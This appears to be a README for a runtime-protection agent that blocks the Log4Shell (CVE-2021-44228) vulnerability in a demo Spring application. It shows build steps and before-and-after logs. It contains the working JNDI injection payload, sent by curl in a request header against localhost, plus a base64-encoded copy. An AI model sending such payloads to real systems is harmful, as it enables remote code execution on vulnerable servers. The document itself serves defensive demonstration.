RASP for CVE-2021-44228 (for educational purposes only).
- Java (AdoptOpenJDK 11.0.8)
==================== Run Application ====================
$ java -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
(...snip...)
2021-12-21 20:38:15.353 INFO 44920 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:38:15.363 INFO 44920 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 1.896 seconds (JVM running for 2.912)
==================== Send payload ====================
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'
==================== Application logs ====================
Dec 21, 2021 8:39:07 PM org.apache.catalina.core.ApplicationContext log
INFO: Initializing Spring DispatcherServlet 'dispatcherServlet'
2021-12-21 20:39:07.962 INFO 45042 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
2021-12-21 20:39:07.964 INFO 45042 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 1 ms
-------HACKED------ ⭐️ Attack succeeded (no agent loaded) ⭐️
2021-12-21 20:39:07.995 INFO 45042 --- [nio-8080-exec-1] MainController
==================== Run Application ====================
$ java -javaagent:./lib/cve_2021_44228_rasp-jar-with-dependencies.jar -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
Loading CVE-2021-44228 RASP ⭐️ RASP agent loaded ⭐️
(...snip...)
2021-12-21 20:51:12.335 INFO 45330 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:51:12.347 INFO 45330 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 2.02 seconds (JVM running for 3.163)
==================== Send payload ====================
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'
==================== Application logs ====================
Dec 21, 2021 8:51:59 PM org.apache.catalina.core.ApplicationContext log
INFO: Initializing Spring DispatcherServlet 'dispatcherServlet'
2021-12-21 20:51:59.158 INFO 45330 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
2021-12-21 20:51:59.159 INFO 45330 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 1 ms
Before : ldap://127.0.0.1:1389/a
JndiLookupTransformer#sanitizing ⭐️ the agent rewrites the JNDI name (slashes become x) before JndiLookup resolves it ⭐️
After : ldap:xx127.0.0.1:1389xa ⭐️ javax.naming.CommunicationException: the lookup still runs, but the mangled name is no longer parsed as an LDAP URL, so the provider falls back to localhost:389, where nothing is listening ⭐️
2021-12-21 20:51:59,226 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap:xx127.0.0.1:1389xa]. javax.naming.CommunicationException: localhost:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:237)
at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1610)
at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2751)
at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:319)
at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
(...snip...)
2021-12-21 20:51:59.191 INFO 45330 --- [nio-8080-exec-1] MainController : Received a request for API version ${jndi:ldap://127.0.0.1:1389/a}
==================== Build the RASP agent ====================
$ mvn clean package
$ ls target/cve_2021_44228_rasp-jar-with-dependencies.jar
$ mv target/cve_2021_44228_rasp-jar-with-dependencies.jar ../web_application/lib
==================== Build and run the web application with the agent ====================
$ cd ../web_application
$ ./gradlew bootJar
$ ls build/libs/web_application-0.0.1-SNAPSHOT.jar
$ java -javaagent:./lib/cve_2021_44228_rasp-jar-with-dependencies.jar -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
==================== Send payload ====================
# Attack
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'
# Base64 Attack (the same payload, base64-encoded, for the /base64 endpoint)
$ curl 127.0.0.1:8080/base64 -H 'X-Api-Version: JHtqbmRpOmxkYXA6Ly8xMjcuMC4wLjE6MTM4OS9hfQ=='